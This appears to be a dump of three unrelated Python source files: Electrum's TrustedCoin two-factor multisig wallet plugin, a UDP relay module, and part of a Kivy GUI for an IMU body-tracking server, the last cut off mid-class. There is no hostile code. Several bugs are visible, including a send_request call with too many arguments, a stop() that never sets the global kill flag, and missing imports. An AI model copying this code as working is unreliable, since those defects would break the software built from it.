from electrum import bitcoin
from electrum import constants
from electrum import keystore
from electrum.bitcoin import *
from electrum.mnemonic import Mnemonic
from electrum import version
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugins import BasePlugin, hook
from electrum.util import NotEnoughFunds
from electrum.storage import STO_EV_USER_PW
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
def send_request(self, method, relative_url, data=None):
kwargs = {'headers': {}}
if self.user_agent:
kwargs['headers']['user-agent'] = self.user_agent
if method == 'get' and data:
kwargs['params'] = data
elif method == 'post' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['content-type'] = 'application/json'
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
try:
response = requests.request(method, url, **kwargs)
except Exception as e:
raise ErrorConnectingServer(e)
if self.debug:
print(response.text)
if response.status_code != 200:
message = str(response.text)
if response.headers.get('content-type') == 'application/json':
r = response.json()
if 'message' in r:
message = r['message']
raise TrustedCoinException(message, response.status_code)
if response.headers.get('content-type') == 'application/json':
return response.json()
else:
return response.text
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self.auth_code = None
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
assert price <= 100000 * n
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = (TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def sign_transaction(self, tx, password):
Multisig_Wallet.sign_transaction(self, tx, password)
if tx.is_complete():
return
self.plugin.prompt_user_for_otp(self, tx)
if not self.auth_code:
self.print_error("sign_transaction: no auth code")
return
long_user_id, short_id = self.get_user_id()
tx_dict = tx.as_dict()
raw_tx = tx_dict["hex"]
r = server.sign(short_id, raw_tx, self.auth_code)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.auth_code = None
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return bitcoin.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bitcoin._CKD_pub(cK, c, s)
return bitcoin.serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = bitcoin.CKD_pub(cK, c, num)
return bitcoin.public_key_to_p2pkh(cK)
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return bitcoin.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
if wallet.billing_info is None:
assert wallet.can_sign_without_server()
return None
address = wallet.billing_info['billing_address']
for _type, addr, amount in tx.outputs():
if _type == TYPE_ADDRESS and addr == address:
return address, amount
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(e))
return
billing_address = make_billing_address(wallet, billing_info['billing_index'])
assert billing_address == billing_info['billing_address']
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(DISCLAIMER), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrum.mnemonic import Mnemonic
from electrum.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
assert passphrase == ''
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
msg = [
_("Your wallet file is: {}.").format(os.path.abspath(wizard.storage.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.stack = []
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('create_remote_key'))
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, wizard):
email = self.accept_terms_of_use(wizard)
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except socket.error:
wizard.show_message('Server not reachable, aborting')
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
try:
assert _id == short_id, ("user id error", _id, short_id)
assert xpub3 == _xpub3, ("xpub3 error", xpub3, _xpub3)
except Exception as e:
wizard.show_message(str(e))
return
self.check_otp(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3):
otp, reset = self.request_otp_dialog(wizard, short_id, otp_secret)
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except:
wizard.show_message(_('Incorrect password'))
return
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
try:
assert xpub1 == wizard.storage.get('x1/')['xpub']
assert xpub2 == wizard.storage.get('x2/')['xpub']
except:
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = regenerate_key(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.check_otp(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'create_remote_key'
|
udp.py
|
import logging
import socket
import sys
import threading
import hooker
from relay import status
hooker.EVENTS.append([
"udp.start",
"udp.pre_recv",
"udp.post_recv",
"udp.pre_c2s",
"udp.post_c2s",
"udp.pre_s2c",
"udp.post_s2c",
"udp.stop"
])
_KILL = False
_RELAYPORT = 0
_REMOTEADDRESS = ""
_REMOTEPORT = 0
def relay(recvbuff):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("0.0.0.0", _RELAYPORT))
incomingsetup = False
clientport = 0
clientip = ""
hooker.EVENTS["udp.start"]()
while True:
hooker.EVENTS["udp.pre_recv"](sock)
data, fromaddr = sock.recvfrom(recvbuff)
data = bytearray(data)
hooker.EVENTS["udp.pre_recv"](sock, data, fromaddr)
if _KILL:
hooker.EVENTS["udp.stop"](sock)
sock.close()
return
if not incomingsetup:
clientport = fromaddr[1]
clientip = fromaddr[0]
incomingsetup = True
if fromaddr[0] == clientip and fromaddr[1] == clientport:
# Forward from client to server
hooker.EVENTS["udp.pre_c2s"](data)
sock.sendto(data, (_REMOTEADDRESS, _REMOTEPORT))
hooker.EVENTS["udp.post_c2s"](data)
status.BYTESTOREMOTE += sys.getsizeof(data)
else:
# Forward from server to client
hooker.EVENTS["udp.pre_s2c"](data)
sock.sendto(data, (clientip, clientport))
hooker.EVENTS["udp.post_s2c"](data)
status.BYTESFROMREMOTE += sys.getsizeof(data)
def start(relayport, remoteaddress, remoteport, recvbuff):
global _RELAYPORT
global _REMOTEADDRESS
global _REMOTEPORT
_RELAYPORT = relayport
_REMOTEADDRESS = remoteaddress
_REMOTEPORT = remoteport
relaythread = threading.Thread(target=relay, args=[recvbuff])
relaythread.start()
def stop():
_KILL = True
# Send anything to the input port to trigger it to read, therefore allowing the thread to close
quitsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
quitsock.sendto("killing", ("127.0.0.1", _RELAYPORT))
quitsock.close()
|
main.py
|
import os
import sys
def resource_path(file):
try:
directory = os.path.abspath(sys._MEIPASS)
except:
directory = os.path.abspath('.')
return os.path.join(directory, file)
from kivy.config import Config
Config.set('graphics', 'maxfps', '5000')
Config.set('input', 'mouse', 'mouse,disable_multitouch')
Config.set('graphics', 'width', '900')
Config.set('graphics', 'height', '700')
Config.set('graphics', 'minimum_width', '900')
Config.set('graphics', 'minimum_height', '700')
Config.set('kivy', 'window_icon', resource_path('icon.png'))
from kivy.app import App
from kivy.lang import Builder
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.uix.spinner import Spinner
from kivy.uix.switch import Switch
from kivy.uix.tabbedpanel import TabbedPanel, TabbedPanelItem
from kivy.uix.image import Image
from kivy.clock import Clock, mainthread
from kivy.properties import ObjectProperty
from kivy.core.window import Window
from plyer import filechooser
import serial
import serial.tools.list_ports
from configparser import ConfigParser
import threading
import socket
import struct
import binascii
import time
import math
import subprocess
VERSION = "0.7"
ROLE = ['No role',
'Left foot',
'Right foot',
'Left lower leg',
'Right lower leg',
'Left thigh',
'Right thigh',
'Waist',
'Chest',
'Left shoulder',
'Right shoulder',
'Left upper arm',
'Right upper arm']
MODE = ['AR/VR Stabilized Rotation Vector', 'AR/VR Stabilized Game Rotation Vector']
MODE_SHORT = ['RV', 'GRV']
POWER = [8, 20, 28, 34, 44, 52, 60, 66, 72, 78]
ACCURACY = ['Unreliable', 'Low', 'Medium', 'High']
tpose_image = resource_path('T-pose_skeleton_diagram.png')
kinematics_image = resource_path('tracker_kinematic_chain.png')
def battPercent(v):
v = float(v)
denominator = (1 + (v / 3.7)**80)**0.165
percent = int(123 - 123 / denominator)
if percent >= 100:
percent = 100
elif percent <= 0:
percent = 0
return percent
def mapRange(value, inMin=-32767.0, inMax=32767.0, outMin=-1.0, outMax=1.0):
return outMin + (((value - inMin) / (inMax - inMin)) * (outMax - outMin))
class TrackerView:
ac = ObjectProperty()
px = ObjectProperty()
py = ObjectProperty()
pz = ObjectProperty()
qx = ObjectProperty()
qy = ObjectProperty()
qz = ObjectProperty()
qw = ObjectProperty()
class TransformInput:
tx = ObjectProperty()
ty = ObjectProperty()
tz = ObjectProperty()
class SegmentSlider:
slider = ObjectProperty()
class OffsetSlider:
slider1 = ObjectProperty()
slider2 = ObjectProperty()
class OnOffSwitch:
switch = ObjectProperty()
class Pop(FloatLayout):
def __init__(self):
super().__init__()
self.size = (Window.size[1] * 0.8, Window.size[1] * 0.8)
self.pos_hint = {'center_x': .5, 'center_y': .5}
panel = TabbedPanel(do_default_tab=False,
size=(Window.size[1] * 0.8, Window.size[1] * 0.8),
pos_hint={'center_x': .5, 'center_y': .5},
tab_width=Window.size[1] * 0.8 / 2.1)
panelOne = TabbedPanelItem(text='T-pose skeleton joint diagram')
image_path = tpose_image
img = Image(source=image_path, pos_hint = {'center_x': .5, 'center_y': .5})
panelOne.add_widget(img)
panelTwo = TabbedPanelItem(text='Tracker kinematic chain')
image_path = kinematics_image
img = Image(source=image_path, pos_hint = {'center_x': .5, 'center_y': .5})
panelTwo.add_widget(img)
panel.add_widget(panelOne)
panel.add_widget(panelTwo)
self.add_widget(panel)
class RoleList(BoxLayout):
def __init__(self, mac, connect, mode, power, sleep, role):
super().__init__()
self.height = App.get_running_app().root.ids.layout_ref.height / 1.75
self.size_hint_y = None
self.padding = [0, 0, 0, 2]
extend = '_extend' in mac
L1 = Label(size_hint_x=0.2, text=str(mac))
C1 = Switch(size_hint_x=0.1, active=connect, disabled=extend)
S1 = Spinner(size_hint_x=0.35, text=str(mode), values=MODE)
S2 = Spinner(size_hint_x=0.1, text=str(power), values=['{:.1f}'.format(x/4.0) for x in POWER], disabled=extend)
C2 = Switch(size_hint_x=0.1, active=sleep, disabled=extend)
S3 = Spinner(size_hint_x=0.15, text=str(role), values=ROLE)
App.get_running_app().root.ids[mac + '_role_mac'] = L1
App.get_running_app().root.ids[mac + '_role_connect'] = C1
App.get_running_app().root.ids[mac + '_role_mode'] = S1
App.get_running_app().root.ids[mac + '_role_power'] = S2
App.get_running_app().root.ids[mac + '_role_sleep'] = C2
App.get_running_app().root.ids[mac + '_role_role'] = S3
C1.bind(active=self.onActive1)
S1.bind(text=self.onText1)
S2.bind(text=self.onText2)
C2.bind(active=self.onActive2)
S3.bind(text=self.onText3)
self.add_widget(L1)
self.add_widget(C1)
self.add_widget(S1)
self.add_widget(S2)
self.add_widget(C2)
self.add_widget(S3)
def onActive1(self, instance, value):
for k, v in App.get_running_app().root.ids.items():
if '_main' in k and v == instance:
mac = k.replace('_role_connect', '')
ImuFbtServer.devices_list[mac]['connect'] = value
if mac.replace('_main', '_extend') in ImuFbtServer.devices_list.keys() and \
mac.replace('_main', '_extend_role_connect') in App.get_running_app().root.ids.keys():
App.get_running_app().root.ids[mac.replace('_main', '_extend_role_connect')].active = value
ImuFbtServer.devices_list[mac.replace('_main', '_extend')]['connect'] = value
def onText1(self, instance, value):
for k, v in App.get_running_app().root.ids.items():
if v == instance:
mac = k.replace('_role_mode', '')
ImuFbtServer.devices_list[mac]['mode'] = value
def onText2(self, instance, value):
for k, v in App.get_running_app().root.ids.items():
if '_main' in k and v == instance:
mac = k.replace('_role_power', '')
ImuFbtServer.devices_list[mac]['power'] = value
if mac.replace('_main', '_extend') in ImuFbtServer.devices_list.keys() and \
mac.replace('_main', '_extend_role_power') in App.get_running_app().root.ids.keys():
App.get_running_app().root.ids[mac.replace('_main', '_extend_role_power')].text = value
ImuFbtServer.devices_list[mac.replace('_main', '_extend')]['power'] = value
def onActive2(self, instance, value):
for k, v in App.get_running_app().root.ids.items():
if '_main' in k and v == instance:
mac = k.replace('_role_sleep', '')
ImuFbtServer.devices_list[mac]['sleep'] = value
if mac.replace('_main', '_extend') in ImuFbtServer.devices_list.keys() and \
mac.replace('_main', '_extend_role_sleep') in App.get_running_app().root.ids.keys():
App.get_running_app().root.ids[mac.replace('_main', '_extend_role_sleep')].active = value
ImuFbtServer.devices_list[mac.replace('_main', '_extend')]['sleep'] = value
def onText3(self, instance, value):
for k, v in App.get_running_app().root.ids.items():
if v == instance:
mac = k.replace('_role_role', '')
ImuFbtServer.devices_list[mac]['role'] = value
class DeviceList(BoxLayout):
def __init__(self, mac, ip, battery, mode, accuracy, power, sleep, role):
super().__init__()
self.height = App.get_running_app().root.ids.layout_ref.height / 1.75
self.size_hint_y = None
self.padding = [0, 0, 0, 2]
L1 = Label(size_hint_x=0.2, text=str(mac))
L2 = Label(size_hint_x=0.175, text=str(ip))
L3 = Label(size_hint_x=0.075, text=str(battery))
L4 = Label(size_hint_x=0.075, text=str(battPercent(battery)))
L5 = Label(size_hint_x=0.075, text=str(mode))
L6 = Label(size_hint_x=0.075, text=str(accuracy))
L7 = Label(size_hint_x=0.0875, text=str(power))
L8 = Label(size_hint_x=0.0875, text=str(sleep))
L9 = Label(size_hint_x=0.15, text=str(role))
App.get_running_app().root.ids[mac + '_list_mac'] = L1
App.get_running_app().root.ids[mac + '_list_ip'] = L2
App.get_running_app().root.ids[mac + '_list_battery'] = L3
App.get_running_app().root.ids[mac + '_list_percent'] = L4
App.get_running_app().root.ids[mac + '_list_mode'] = L5
App.get_running_app().root.ids[mac + '_list_accuracy'] = L6
App.get_running_app().root.ids[mac + '_list_power'] = L7
App.get_running_app().root.ids[mac + '_list_sleep'] = L8
App.get_running_app().root.ids[mac + '_list_role'] = L9
self.add_widget(L1)
self.add_widget(L2)
self.add_widget(L3)
self.add_widget(L4)
self.add_widget(L5)
self.add_widget(L6)
self.add_widget(L7)
self.add_widget(L8)
self.add_widget(L9)
class ImuFbtServer(App):
broadPort = 6969
devices_list = {}
devices_online = {}
devices_broad_online = {}
focused = False
temp_focus = ''
current_page = ''
def save_settings(self):
filechooser.save_file(on_selection=self.handle_save, filters=['*.ini'])
def load_settings(self):
filechooser.open_file(on_selection=self.handle_load, filters=['*.ini'])
def handle_save(self, selection):
if len(selection):
file = selection[0]
if file[-4:] != '.ini':
file += '.ini'
self.save(file)
def handle_load(self, selection):
if len(selection):
self.load(selection[0])
def show_popup(self):
show = Pop()
size = (Window.size[1] * 0.8, Window.size[1] * 0.8)
popupWindow = Popup(title="Help", content=show, size_hint=(None, None), size=size)
popupWindow.open()
@mainthread
def textinput_focus(self, *args):
instance = args[0][0]
value = args[0][1]
if value:
self.focused = True
self.temp_focus = instance.text
Clock.schedule_once(lambda dt: instance.select_all())
else:
if instance.text == '':
instance.text = self.temp_focus
self.focused = False
@mainthread
def wifi_configure_disabled(self, val):
self.root.ids.wifi_configure.disabled = val
@mainthread
def wifi_configure_status_text(self, val):
self.root.ids.wifi_configure_status.text = val
def wifi_thread(self):
self.wifi_configure_disabled(True)
try:
port = self.root.ids.com_port_list.text
ssid = self.root.ids.wifi_ssid.text
password = self.root.ids.wifi_password.text
if len(port) == 0 or len(ssid) == 0 or len(password) == 0:
self.wifi_configure_status_text('Invalid settings')
self.wifi_configure_disabled(False)
return
ser = serial.Serial(port, 115200, timeout=0.1, write_timeout=0.1,
xonxoff=False, rtscts=False, dsrdtr=False)
payload = '111\n{}\n{}\n'.format(ssid, password)
ser.write(payload.encode())
start = time.perf_counter()
while self.wifi_thread_run:
msg = ser.read(1)
if len(msg) > 0 and msg[0] == 110:
self.wifi_configure_status_text('WiFi configured')
break
if time.perf_counter() - start >= 3:
self.wifi_configure_status_text('Serial timeout error')
break
time.sleep(0.1)
ser.close()
except:
self.wifi_configure_status_text('Serial connection error')
self.wifi_configure_disabled(False)
self.wifi_thread_run = False
def configure_wifi(self):
self.wifi_thread_run = True
self.wifi_thread_process = threading.Thread(target=self.wifi_thread, args=())
self.wifi_thread_process.start()
def com_port_scanner(self, dt):
com_list = serial.tools.list_ports.comports()
port_list = []
for port in com_list:
port_list.append(port[0])
if self.root.ids.com_port_list.text not in port_list:
self.root.ids.com_port_list.text = ''
self.root.ids.com_port_list.values = port_list
@mainthread
def calibrate_imu_button_disabled(self, val):
self.root.ids.calibrate_imu_button.disabled = val
@mainthread
def calibrate_imu_button_text(self, val):
self.root.ids.calibrate_imu_button.text = val
def calibrate(self):
self.calibrate_imu_button_disabled(True)
i = 3
while self.calibrate_run:
self.calibrate_imu_button_text('Calibrating in {}...'.format(i))
i -= 1
time.sleep(1)
if i <= 0:
payload = struct.pack('<B', 51)
if self.bridgePort != 0:
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
break
self.calibrate_run = False
self.calibrate_imu_button_text('Calibrate')
